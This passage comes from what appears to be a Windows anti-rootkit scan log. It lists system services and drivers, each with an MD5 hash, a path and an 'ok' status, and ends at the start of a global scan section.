14:26:46.0131 1440 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2psvc C:\Windows\system32\p2psvc.dll
14:26:46.0137 1440 p2psvc - ok
14:26:46.0176 1440 [ 0FA9B5055484649D63C303FE404E5F4D ] Parport C:\Windows\system32\drivers\parport.sys
14:26:46.0195 1440 Parport - ok
14:26:46.0233 1440 [ B9C2B89F08670E159F7181891E449CD9 ] partmgr C:\Windows\system32\drivers\partmgr.sys
14:26:46.0255 1440 partmgr - ok
14:26:46.0277 1440 [ 4F9A6A8A31413180D0FCB279AD5D8112 ] Parvdm C:\Windows\system32\drivers\parvdm.sys
14:26:46.0300 1440 Parvdm - ok
14:26:46.0328 1440 [ C6276AD11F4BB49B58AA1ED88537F14A ] PcaSvc C:\Windows\System32\pcasvc.dll
14:26:46.0330 1440 PcaSvc - ok
14:26:46.0360 1440 [ 941DC1D19E7E8620F40BBC206981EFDB ] pci C:\Windows\system32\drivers\pci.sys
14:26:46.0392 1440 pci - ok
14:26:46.0430 1440 [ 3B1901E401473E03EB8C874271E50C26 ] pciide C:\Windows\system32\drivers\pciide.sys
14:26:46.0448 1440 pciide - ok
14:26:46.0477 1440 [ E6F3FB1B86AA519E7698AD05E58B04E5 ] pcmcia C:\Windows\system32\drivers\pcmcia.sys
14:26:46.0507 1440 pcmcia - ok
14:26:46.0575 1440 [ 6349F6ED9C623B44B52EA3C63C831A92 ] PEAUTH C:\Windows\system32\drivers\peauth.sys
14:26:46.0648 1440 PEAUTH - ok
14:26:46.0743 1440 [ B1689DF169143F57053F795390C99DB3 ] pla C:\Windows\system32\pla.dll
14:26:46.0780 1440 pla - ok
14:26:46.0809 1440 [ C5E7F8A996EC0A82D508FD9064A5569E ] PlugPlay C:\Windows\system32\umpnpmgr.dll
14:26:46.0817 1440 PlugPlay - ok
14:26:46.0845 1440 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPAutoReg C:\Windows\system32\p2psvc.dll
14:26:46.0856 1440 PNRPAutoReg - ok
14:26:46.0875 1440 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPsvc C:\Windows\system32\p2psvc.dll
14:26:46.0885 1440 PNRPsvc - ok
14:26:46.0917 1440 [ D0494460421A03CD5225CCA0059AA146 ] PolicyAgent C:\Windows\System32\ipsecsvc.dll
14:26:46.0925 1440 PolicyAgent - ok
14:26:46.0954 1440 [ ECFFFAEC0C1ECD8DBC77F39070EA1DB1 ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys
14:26:46.0999 1440 PptpMiniport - ok
14:26:47.0030 1440 [ 0E3CEF5D28B40CF273281D620C50700A ] Processor C:\Windows\system32\drivers\processr.sys
14:26:47.0046 1440 Processor - ok
14:26:47.0087 1440 [ 0508FAA222D28835310B7BFCA7A77346 ] ProfSvc C:\Windows\system32\profsvc.dll
14:26:47.0087 1440 ProfSvc - ok
14:26:47.0097 1440 [ A3E186B4B935905B829219502557314E ] ProtectedStorage C:\Windows\system32\lsass.exe
14:26:47.0097 1440 ProtectedStorage - ok
14:26:47.0127 1440 [ 99514FAA8DF93D34B5589187DB3AA0BA ] PSched C:\Windows\system32\DRIVERS\pacer.sys
14:26:47.0137 1440 PSched - ok
14:26:47.0197 1440 [ CCDAC889326317792480C0A67156A1EC ] ql2300 C:\Windows\system32\drivers\ql2300.sys
14:26:47.0257 1440 ql2300 - ok
14:26:47.0287 1440 [ 81A7E5C076E59995D54BC1ED3A16E60B ] ql40xx C:\Windows\system32\drivers\ql40xx.sys
14:26:47.0317 1440 ql40xx - ok
14:26:47.0347 1440 [ E9ECAE663F47E6CB43962D18AB18890F ] QWAVE C:\Windows\system32\qwave.dll
14:26:47.0387 1440 QWAVE - ok
14:26:47.0417 1440 [ 9F5E0E1926014D17486901C88ECA2DB7 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys
14:26:47.0437 1440 QWAVEdrv - ok
14:26:47.0467 1440 [ 147D7F9C556D259924351FEB0DE606C3 ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys
14:26:47.0487 1440 RasAcd - ok
14:26:47.0517 1440 [ F6A452EB4CEADBB51C9E0EE6B3ECEF0F ] RasAuto C:\Windows\System32\rasauto.dll
14:26:47.0547 1440 RasAuto - ok
14:26:47.0587 1440 [ A214ADBAF4CB47DD2728859EF31F26B0 ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys
14:26:47.0607 1440 Rasl2tp - ok
14:26:47.0647 1440 [ 75D47445D70CA6F9F894B032FBC64FCF ] RasMan C:\Windows\System32\rasmans.dll
14:26:47.0647 1440 RasMan - ok
14:26:47.0687 1440 [ 509A98DD18AF4375E1FC40BC175F1DEF ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys
14:26:47.0707 1440 RasPppoe - ok
14:26:47.0717 1440 [ 2005F4A1E05FA09389AC85840F0A9E4D ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys
14:26:47.0717 1440 RasSstp - ok
14:26:47.0767 1440 [ B14C9D5B9ADD2F84F70570BBBFAA7935 ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
14:26:47.0797 1440 rdbss - ok
14:26:47.0817 1440 [ 89E59BE9A564262A3FB6C4F4F1CD9899 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
14:26:47.0827 1440 RDPCDD - ok
14:26:47.0857 1440 [ E8BD98D46F2ED77132BA927FCCB47D8B ] rdpdr C:\Windows\system32\drivers\rdpdr.sys
14:26:47.0887 1440 rdpdr - ok
14:26:47.0897 1440 [ 9D91FE5286F748862ECFFA05F8A0710C ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
14:26:47.0967 1440 RDPENCDD - ok
14:26:48.0017 1440 [ C127EBD5AFAB31524662C48DFCEB773A ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
14:26:48.0127 1440 RDPWD - ok
14:26:48.0237 1440 [ BCDD6B4804D06B1F7EBF29E53A57ECE9 ] RemoteAccess C:\Windows\System32\mprdim.dll
14:26:48.0277 1440 RemoteAccess - ok
14:26:48.0327 1440 [ 9E6894EA18DAFF37B63E1005F83AE4AB ] RemoteRegistry C:\Windows\system32\regsvc.dll
14:26:48.0377 1440 RemoteRegistry - ok
14:26:48.0427 1440 [ 6482707F9F4DA0ECBAB43B2E0398A101 ] RFCOMM C:\Windows\system32\DRIVERS\rfcomm.sys
14:26:48.0487 1440 RFCOMM - ok
14:26:48.0527 1440 [ 5123F83CBC4349D065534EEB6BBDC42B ] RpcLocator C:\Windows\system32\locator.exe
14:26:48.0557 1440 RpcLocator - ok
14:26:48.0667 1440 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] RpcSs C:\Windows\system32\rpcss.dll
14:26:48.0667 1440 RpcSs - ok
14:26:48.0727 1440 [ 9C508F4074A39E8B4B31D27198146FAD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
14:26:48.0767 1440 rspndr - ok
14:26:48.0787 1440 [ A3E186B4B935905B829219502557314E ] SamSs C:\Windows\system32\lsass.exe
14:26:48.0787 1440 SamSs - ok
14:26:48.0827 1440 [ 3CE8F073A557E172B330109436984E30 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys
14:26:48.0867 1440 sbp2port - ok
14:26:48.0917 1440 [ 77B7A11A0C3D78D3386398FBBEA1B632 ] SCardSvr C:\Windows\System32\SCardSvr.dll
14:26:48.0957 1440 SCardSvr - ok
14:26:48.0997 1440 [ 1A58069DB21D05EB2AB58EE5753EBE8D ] Schedule C:\Windows\system32\schedsvc.dll
14:26:49.0017 1440 Schedule - ok
14:26:49.0027 1440 [ 312EC3E37A0A1F2006534913E37B4423 ] SCPolicySvc C:\Windows\System32\certprop.dll
14:26:49.0027 1440 SCPolicySvc - ok
14:26:49.0047 1440 [ 716313D9F6B0529D03F726D5AAF6F191 ] SDRSVC C:\Windows\System32\SDRSVC.dll
14:26:49.0057 1440 SDRSVC - ok
14:26:49.0087 1440 [ 90A3935D05B494A5A39D37E71F09A677 ] secdrv C:\Windows\system32\drivers\secdrv.sys
14:26:49.0107 1440 secdrv - ok
14:26:49.0127 1440 [ FD5199D4D8A521005E4B5EE7FE00FA9B ] seclogon C:\Windows\system32\seclogon.dll
14:26:49.0127 1440 seclogon - ok
14:26:49.0147 1440 [ A9BBAB5759771E523F55563D6CBE140F ] SENS C:\Windows\System32\sens.dll
14:26:49.0147 1440 SENS - ok
14:26:49.0157 1440 [ 68E44E331D46F0FB38F0863A84CD1A31 ] Serenum C:\Windows\system32\drivers\serenum.sys
14:26:49.0177 1440 Serenum - ok
14:26:49.0207 1440 [ C70D69A918B178D3C3B06339B40C2E1B ] Serial C:\Windows\system32\drivers\serial.sys
14:26:49.0207 1440 Serial - ok
14:26:49.0227 1440 [ 8AF3D28A879BF75DB53A0EE7A4289624 ] sermouse C:\Windows\system32\drivers\sermouse.sys
14:26:49.0247 1440 sermouse - ok
14:26:49.0287 1440 [ D2193326F729B163125610DBF3E17D57 ] SessionEnv C:\Windows\system32\sessenv.dll
14:26:49.0287 1440 SessionEnv - ok
14:26:49.0317 1440 [ 103B79418DA647736EE95645F305F68A ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
14:26:49.0337 1440 sffdisk - ok
14:26:49.0357 1440 [ 8FD08A310645FE872EEEC6E08C6BF3EE ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
14:26:49.0377 1440 sffp_mmc - ok
14:26:49.0397 1440 [ 9CFA05FCFCB7124E69CFC812B72F9614 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys
14:26:49.0427 1440 sffp_sd - ok
14:26:49.0447 1440 [ 46ED8E91793B2E6F848015445A0AC188 ] sfloppy C:\Windows\system32\drivers\sfloppy.sys
14:26:49.0447 1440 sfloppy - ok
14:26:49.0467 1440 [ E1499BD0FF76B1B2FBBF1AF339D91165 ] SharedAccess C:\Windows\System32\ipnathlp.dll
14:26:49.0487 1440 SharedAccess - ok
14:26:49.0507 1440 [ C7230FBEE14437716701C15BE02C27B8 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
14:26:49.0507 1440 ShellHWDetection - ok
14:26:49.0547 1440 [ D2A595D6EEBEEAF4334F8E50EFBC9931 ] sisagp C:\Windows\system32\drivers\sisagp.sys
14:26:49.0577 1440 sisagp - ok
14:26:49.0587 1440 [ CEDD6F4E7D84E9F98B34B3FE988373AA ] SiSRaid2 C:\Windows\system32\drivers\sisraid2.sys
14:26:49.0617 1440 SiSRaid2 - ok
14:26:49.0637 1440 [ DF843C528C4F69D12CE41CE462E973A7 ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys
14:26:49.0667 1440 SiSRaid4 - ok
14:26:49.0777 1440 [ 862BB4CBC05D80C5B45BE430E5EF872F ] slsvc C:\Windows\system32\SLsvc.exe
14:26:50.0271 1440 slsvc - ok
14:26:50.0365 1440 [ 6EDC422215CD78AA8A9CDE6B30ABBD35 ] SLUINotify C:\Windows\system32\SLUINotify.dll
14:26:50.0424 1440 SLUINotify - ok
14:26:50.0562 1440 [ 7B75299A4D201D6A6533603D6914AB04 ] Smb C:\Windows\system32\DRIVERS\smb.sys
14:26:50.0624 1440 Smb - ok
14:26:50.0706 1440 [ 2A146A055B4401C16EE62D18B8E2A032 ] SNMPTRAP C:\Windows\System32\snmptrap.exe
14:26:50.0710 1440 SNMPTRAP - ok
14:26:50.0937 1440 [ 50660E6B082A7BF86751A003C3BB5210 ] SNP2UVC C:\Windows\system32\DRIVERS\snp2uvc.sys
14:26:51.0372 1440 SNP2UVC - ok
14:26:51.0422 1440 [ 7AEBDEEF071FE28B0EEF2CDD69102BFF ] spldr C:\Windows\system32\drivers\spldr.sys
14:26:51.0445 1440 spldr - ok
14:26:51.0473 1440 [ 8554097E5136C3BF9F69FE578A1B35F4 ] Spooler C:\Windows\System32\spoolsv.exe
14:26:51.0477 1440 Spooler - ok
14:26:51.0532 1440 [ 41987F9FC0E61ADF54F581E15029AD91 ] srv C:\Windows\system32\DRIVERS\srv.sys
14:26:51.0536 1440 srv - ok
14:26:51.0570 1440 [ FF33AFF99564B1AA534F58868CBE41EF ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
14:26:51.0613 1440 srv2 - ok
14:26:51.0645 1440 [ 7605C0E1D01A08F3ECD743F38B834A44 ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
14:26:51.0733 1440 srvnet - ok
14:26:51.0802 1440 [ 03D50B37234967433A5EA5BA72BC0B62 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
14:26:51.0806 1440 SSDPSRV - ok
14:26:51.0828 1440 [ A36EE93698802CD899F98BFD553D8185 ] ssmdrv C:\Windows\system32\DRIVERS\ssmdrv.sys
14:26:51.0884 1440 ssmdrv - ok
14:26:51.0974 1440 [ 6F1A32E7B7B30F004D9A20AFADB14944 ] SstpSvc C:\Windows\system32\sstpsvc.dll
14:26:51.0977 1440 SstpSvc - ok
14:26:52.0217 1440 [ 5DE7D67E49B88F5F07F3E53C4B92A352 ] stisvc C:\Windows\System32\wiaservc.dll
14:26:52.0230 1440 stisvc - ok
14:26:52.0243 1440 [ 7BA58ECF0C0A9A69D44B3DCA62BECF56 ] swenum C:\Windows\system32\DRIVERS\swenum.sys
14:26:52.0253 1440 swenum - ok
14:26:52.0294 1440 [ F21FD248040681CCA1FB6C9A03AAA93D ] swprv C:\Windows\System32\swprv.dll
14:26:52.0310 1440 swprv - ok
14:26:52.0361 1440 [ 192AA3AC01DF071B541094F251DEED10 ] Symc8xx C:\Windows\system32\drivers\symc8xx.sys
14:26:52.0380 1440 Symc8xx - ok
14:26:52.0403 1440 [ 8C8EB8C76736EBAF3B13B633B2E64125 ] Sym_hi C:\Windows\system32\drivers\sym_hi.sys
14:26:52.0427 1440 Sym_hi - ok
14:26:52.0454 1440 [ 8072AF52B5FD103BBBA387A1E49F62CB ] Sym_u3 C:\Windows\system32\drivers\sym_u3.sys
14:26:52.0486 1440 Sym_u3 - ok
14:26:52.0632 1440 [ 0E8676FB3BB95AA40FDF7A4A31018C8B ] SynTP C:\Windows\system32\DRIVERS\SynTP.sys
14:26:53.0001 1440 SynTP - ok
14:26:53.0142 1440 [ 9A51B04E9886AA4EE90093586B0BA88D ] SysMain C:\Windows\system32\sysmain.dll
14:26:53.0150 1440 SysMain - ok
14:26:53.0205 1440 [ 2DCA225EAE15F42C0933E998EE0231C3 ] TabletInputService C:\Windows\System32\TabSvc.dll
14:26:53.0211 1440 TabletInputService - ok
14:26:53.0271 1440 [ FD90A16CEB10D4FDAA00AAF39B8FF58F ] taphss C:\Windows\system32\DRIVERS\taphss.sys
14:26:53.0386 1440 taphss - ok
14:26:53.0464 1440 [ D7673E4B38CE21EE54C59EEEB65E2483 ] TapiSrv C:\Windows\System32\tapisrv.dll
14:26:53.0483 1440 TapiSrv - ok
14:26:53.0539 1440 [ CB05822CD9CC6C688168E113C603DBE7 ] TBS C:\Windows\System32\tbssvc.dll
14:26:53.0542 1440 TBS - ok
14:26:53.0708 1440 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip C:\Windows\system32\drivers\tcpip.sys
14:26:54.0016 1440 Tcpip - ok
14:26:54.0140 1440 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip6 C:\Windows\system32\DRIVERS\tcpip.sys
14:26:54.0148 1440 Tcpip6 - ok
14:26:54.0193 1440 [ 608C345A255D82A6289C2D468EB41FD7 ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
14:26:54.0224 1440 tcpipreg - ok
14:26:54.0268 1440 [ 5DCF5E267BE67A1AE926F2DF77FBCC56 ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
14:26:54.0277 1440 TDPIPE - ok
14:26:54.0320 1440 [ 389C63E32B3CEFED425B61ED92D3F021 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
14:26:54.0351 1440 TDTCP - ok
14:26:54.0383 1440 [ 76B06EB8A01FC8624D699E7045303E54 ] tdx C:\Windows\system32\DRIVERS\tdx.sys
14:26:54.0414 1440 tdx - ok
14:26:54.0656 1440 [ 9F3E7CABE86BBDECA009DE291DB6D9E2 ] TeamViewer8 C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe
14:26:54.0726 1440 TeamViewer8 - ok
14:26:54.0746 1440 [ 3CAD38910468EAB9A6479E2F01DB43C7 ] TermDD C:\Windows\system32\DRIVERS\termdd.sys
14:26:54.0786 1440 TermDD - ok
14:26:54.0816 1440 [ BB95DA09BEF6E7A131BFF3BA5032090D ] TermService C:\Windows\System32\termsrv.dll
14:26:54.0826 1440 TermService - ok
14:26:54.0836 1440 [ C7230FBEE14437716701C15BE02C27B8 ] Themes C:\Windows\system32\shsvcs.dll
14:26:54.0846 1440 Themes - ok
14:26:54.0856 1440 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] THREADORDER C:\Windows\system32\mmcss.dll
14:26:54.0856 1440 THREADORDER - ok
14:26:54.0886 1440 [ EC74E77D0EB004BD3A809B5F8FB8C2CE ] TrkWks C:\Windows\System32\trkwks.dll
14:26:54.0886 1440 TrkWks - ok
14:26:54.0926 1440 [ 97D9D6A04E3AD9B6C626B9931DB78DBA ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
14:26:54.0926 1440 TrustedInstaller - ok
14:26:54.0976 1440 [ DCF0F056A2E4F52287264F5AB29CF206 ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys
14:26:54.0993 1440 tssecsrv - ok
14:26:55.0018 1440 [ CAECC0120AC49E3D2F758B9169872D38 ] tunmp C:\Windows\system32\DRIVERS\tunmp.sys
14:26:55.0039 1440 tunmp - ok
14:26:55.0062 1440 [ 300DB877AC094FEAB0BE7688C3454A9C ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys
14:26:55.0091 1440 tunnel - ok
14:26:55.0121 1440 [ C3ADE15414120033A36C0F293D4A4121 ] uagp35 C:\Windows\system32\drivers\uagp35.sys
14:26:55.0145 1440 uagp35 - ok
14:26:55.0177 1440 [ D9728AF68C4C7693CB100B8441CBDEC6 ] udfs C:\Windows\system32\DRIVERS\udfs.sys
14:26:55.0206 1440 udfs - ok
14:26:55.0232 1440 [ ECEF404F62863755951E09C802C94AD5 ] UI0Detect C:\Windows\system32\UI0Detect.exe
14:26:55.0264 1440 UI0Detect - ok
14:26:55.0299 1440 [ 75E6890EBFCE0841D3291B02E7A8BDB0 ] uliagpkx C:\Windows\system32\drivers\uliagpkx.sys
14:26:55.0322 1440 uliagpkx - ok
14:26:55.0350 1440 [ 3CD4EA35A6221B85DCC25DAA46313F8D ] uliahci C:\Windows\system32\drivers\uliahci.sys
14:26:55.0376 1440 uliahci - ok
14:26:55.0399 1440 [ 8514D0E5CD0534467C5FC61BE94A569F ] UlSata C:\Windows\system32\drivers\ulsata.sys
14:26:55.0442 1440 UlSata - ok
14:26:55.0472 1440 [ 38C3C6E62B157A6BC46594FADA45C62B ] ulsata2 C:\Windows\system32\drivers\ulsata2.sys
14:26:55.0487 1440 ulsata2 - ok
14:26:55.0509 1440 [ 32CFF9F809AE9AED85464492BF3E32D2 ] umbus C:\Windows\system32\DRIVERS\umbus.sys
14:26:55.0529 1440 umbus - ok
14:26:55.0564 1440 [ 68308183F4AE0BE7BF8ECD07CB297999 ] upnphost C:\Windows\System32\upnphost.dll
14:26:55.0570 1440 upnphost - ok
14:26:55.0600 1440 [ EAFE1E00739AFE6C51487A050E772E17 ] USBAAPL C:\Windows\system32\Drivers\usbaapl.sys
14:26:55.0626 1440 USBAAPL - ok
14:26:55.0678 1440 [ CAF811AE4C147FFCD5B51750C7F09142 ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys
14:26:55.0705 1440 usbccgp - ok
14:26:55.0744 1440 [ E9476E6C486E76BC4898074768FB7131 ] usbcir C:\Windows\system32\drivers\usbcir.sys
14:26:55.0767 1440 usbcir - ok
14:26:55.0847 1440 [ 79E96C23A97CE7B8F14D310DA2DB0C9B ] usbehci C:\Windows\system32\DRIVERS\usbehci.sys
14:26:55.0927 1440 usbehci - ok
14:26:55.0984 1440 [ 4673BBCB006AF60E7ABDDBE7A130BA42 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys
14:26:56.0067 1440 usbhub - ok
14:26:56.0125 1440 [ 38DBC7DD6CC5A72011F187425384388B ] usbohci C:\Windows\system32\drivers\usbohci.sys
14:26:56.0151 1440 usbohci - ok
14:26:56.0185 1440 [ E75C4B5269091D15A2E7DC0B6D35F2F5 ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys
14:26:56.0230 1440 usbprint - ok
14:26:56.0285 1440 [ A508C9BD8724980512136B039BBA65E9 ] usbscan C:\Windows\system32\DRIVERS\usbscan.sys
14:26:56.0315 1440 usbscan - ok
14:26:56.0349 1440 [ BE3DA31C191BC222D9AD503C5224F2AD ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS
14:26:56.0375 1440 USBSTOR - ok
14:26:56.0410 1440 [ 814D653EFC4D48BE3B04A307ECEFF56F ] usbuhci C:\Windows\system32\DRIVERS\usbuhci.sys
14:26:56.0428 1440 usbuhci - ok
14:26:56.0530 1440 [ E67998E8F14CB0627A769F6530BCB352 ] usbvideo C:\Windows\system32\Drivers\usbvideo.sys
14:26:56.0546 1440 usbvideo - ok
14:26:56.0587 1440 [ 1509E705F3AC1D474C92454A5C2DD81F ] UxSms C:\Windows\System32\uxsms.dll
14:26:56.0587 1440 UxSms - ok
14:26:56.0647 1440 [ CD88D1B7776DC17A119049742EC07EB4 ] vds C:\Windows\System32\vds.exe
14:26:56.0687 1440 vds - ok
14:26:56.0777 1440 [ 7D92BE0028ECDEDEC74617009084B5EF ] vga C:\Windows\system32\DRIVERS\vgapnp.sys
14:26:56.0797 1440 vga - ok
14:26:56.0827 1440 [ 2E93AC0A1D8C79D019DB6C51F036636C ] VgaSave C:\Windows\System32\drivers\vga.sys
14:26:56.0857 1440 VgaSave - ok
14:26:56.0877 1440 [ 045D9961E591CF0674A920B6BA3BA5CB ] viaagp C:\Windows\system32\drivers\viaagp.sys
14:26:56.0887 1440 viaagp - ok
14:26:56.0907 1440 [ 56A4DE5F02F2E88182B0981119B4DD98 ] ViaC7 C:\Windows\system32\drivers\viac7.sys
14:26:56.0917 1440 ViaC7 - ok
14:26:56.0927 1440 [ FD2E3175FCADA350C7AB4521DCA187EC ] viaide C:\Windows\system32\drivers\viaide.sys
14:26:56.0957 1440 viaide - ok
14:26:56.0987 1440 [ 69503668AC66C77C6CD7AF86FBDF8C43 ] volmgr C:\Windows\system32\drivers\volmgr.sys
14:26:56.0997 1440 volmgr - ok
14:26:57.0067 1440 [ 23E41B834759917BFD6B9A0D625D0C28 ] volmgrx C:\Windows\system32\drivers\volmgrx.sys
14:26:57.0097 1440 volmgrx - ok
14:26:57.0137 1440 [ 786DB5771F05EF300390399F626BF30A ] volsnap C:\Windows\system32\drivers\volsnap.sys
14:26:57.0147 1440 volsnap - ok
14:26:57.0177 1440 [ D984439746D42B30FC65A4C3546C6829 ] vsmraid C:\Windows\system32\drivers\vsmraid.sys
14:26:57.0217 1440 vsmraid - ok
14:26:57.0367 1440 [ DB3D19F850C6EB32BDCB9BC0836ACDDB ] VSS C:\Windows\system32\vssvc.exe
14:26:57.0407 1440 VSS - ok
14:26:57.0427 1440 [ 96EA68B9EB310A69C25EBB0282B2B9DE ] W32Time C:\Windows\system32\w32time.dll
14:26:57.0427 1440 W32Time - ok
14:26:57.0457 1440 [ 48DFEE8F1AF7C8235D4E626F0C4FE031 ] WacomPen C:\Windows\system32\drivers\wacompen.sys
14:26:57.0467 1440 WacomPen - ok
14:26:57.0507 1440 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarp C:\Windows\system32\DRIVERS\wanarp.sys
14:26:57.0527 1440 Wanarp - ok
14:26:57.0537 1440 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
14:26:57.0537 1440 Wanarpv6 - ok
14:26:57.0567 1440 [ A3CD60FD826381B49F03832590E069AF ] wcncsvc C:\Windows\System32\wcncsvc.dll
14:26:57.0607 1440 wcncsvc - ok
14:26:57.0637 1440 [ 11BCB7AFCDD7AADACB5746F544D3A9C7 ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
14:26:57.0657 1440 WcsPlugInService - ok
14:26:57.0687 1440 [ AFC5AD65B991C1E205CF25CFDBF7A6F4 ] Wd C:\Windows\system32\drivers\wd.sys
14:26:57.0717 1440 Wd - ok
14:26:57.0777 1440 [ A840213F1ACDCC175B4D1D5AAEAC0D7A ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
14:26:57.0817 1440 Wdf01000 - ok
14:26:57.0847 1440 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiServiceHost C:\Windows\system32\wdi.dll
14:26:57.0847 1440 WdiServiceHost - ok
14:26:57.0867 1440 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiSystemHost C:\Windows\system32\wdi.dll
14:26:57.0867 1440 WdiSystemHost - ok
14:26:57.0907 1440 [ 04C37D8107320312FBAE09926103D5E2 ] WebClient C:\Windows\System32\webclnt.dll
14:26:57.0917 1440 WebClient - ok
14:26:57.0937 1440 [ AE3736E7E8892241C23E4EBBB7453B60 ] Wecsvc C:\Windows\system32\wecsvc.dll
14:26:57.0967 1440 Wecsvc - ok
14:26:57.0988 1440 [ 670FF720071ED741206D69BD995EA453 ] wercplsupport C:\Windows\System32\wercplsupport.dll
14:26:58.0020 1440 wercplsupport - ok
14:26:58.0072 1440 [ 32B88481D3B326DA6DEB07B1D03481E7 ] WerSvc C:\Windows\System32\WerSvc.dll
14:26:58.0076 1440 WerSvc - ok
14:26:58.0167 1440 [ 4575AA12561C5648483403541D0D7F2B ] WinDefend C:\Program Files\Windows Defender\mpsvc.dll
14:26:58.0181 1440 WinDefend - ok
14:26:58.0191 1440 WinHttpAutoProxySvc - ok
14:26:58.0267 1440 [ 6B2A1D0E80110E3D04E6863C6E62FD8A ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
14:26:58.0269 1440 Winmgmt - ok
14:26:58.0419 1440 [ 7CFE68BDC065E55AA5E8421607037511 ] WinRM C:\Windows\system32\WsmSvc.dll
14:26:58.0475 1440 WinRM - ok
14:26:58.0544 1440 [ C008405E4FEEB069E30DA1D823910234 ] Wlansvc C:\Windows\System32\wlansvc.dll
14:26:58.0554 1440 Wlansvc - ok
14:26:58.0574 1440 [ 2E7255D172DF0B8283CDFB7B433B864E ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys
14:26:58.0575 1440 WmiAcpi - ok
14:26:58.0626 1440 [ 43BE3875207DCB62A85C8C49970B66CC ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
14:26:58.0640 1440 wmiApSrv - ok
14:26:58.0720 1440 [ 3978704576A121A9204F8CC49A301A9B ] WMPNetworkSvc C:\Program Files\Windows Media Player\wmpnetwk.exe
14:26:58.0739 1440 WMPNetworkSvc - ok
14:26:58.0800 1440 [ CFC5A04558F5070CEE3E3A7809F3FF52 ] WPCSvc C:\Windows\System32\wpcsvc.dll
14:26:58.0837 1440 WPCSvc - ok
14:26:58.0886 1440 [ 801FBDB89D472B3C467EB112A0FC9246 ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
14:26:58.0890 1440 WPDBusEnum - ok
14:26:58.0941 1440 [ DE9D36F91A4DF3D911626643DEBF11EA ] WpdUsb C:\Windows\system32\DRIVERS\wpdusb.sys
14:26:58.0972 1440 WpdUsb - ok
14:26:59.0276 1440 [ DCF3E3EDF5109EE8BC02FE6E1F045795 ] WPFFontCache_v0400 C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
14:26:59.0327 1440 WPFFontCache_v0400 - ok
14:26:59.0364 1440 [ E3A3CB253C0EC2494D4A61F5E43A389C ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
14:26:59.0389 1440 ws2ifsl - ok
14:26:59.0435 1440 [ 1CA6C40261DDC0425987980D0CD2AAAB ] wscsvc C:\Windows\System32\wscsvc.dll
14:26:59.0441 1440 wscsvc - ok
14:26:59.0450 1440 WSearch - ok
14:26:59.0579 1440 [ D7E88349BE0F01E4D8D776ADB1F325BF ] WTGService C:\Program Files\Verbindungsassistent\WTGService.exe
14:26:59.0585 1440 WTGService - ok
14:26:59.0666 1440 [ FC3EC24FCE372C89423E015A2AC1A31E ] wuauserv C:\Windows\system32\wuaueng.dll
14:26:59.0736 1440 wuauserv - ok
14:26:59.0784 1440 [ 06E6F32C8D0A3F66D956F57B43A2E070 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys
14:26:59.0825 1440 WudfPf - ok
14:26:59.0871 1440 [ 867C301E8B790040AE9CF6486E8041DF ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
14:26:59.0903 1440 WUDFRd - ok
14:26:59.0937 1440 [ FE47B7BC8EA320C2D9B5E5BF6E303765 ] wudfsvc C:\Windows\System32\WUDFSvc.dll
14:26:59.0943 1440 wudfsvc - ok
14:26:59.0999 1440 [ C6CA0CC2F7FCDCFE5B551335BFE6D696 ] yukonwlh C:\Windows\system32\DRIVERS\yk60x86.sys
14:27:00.0015 1440 yukonwlh - ok
14:27:00.0030 1440 ================ Scan global ===============================
14:27:00.0046 1440 [ F31EEBC1A1C81FD04005489CC3DCDFE7 ] C:\Windows\system32\basesrv.dll
14:27:00.0061 1440 [ D2293B069E4B63DC17B2F08D45E71124 ] C:\Windows\system32\winsrv.dll
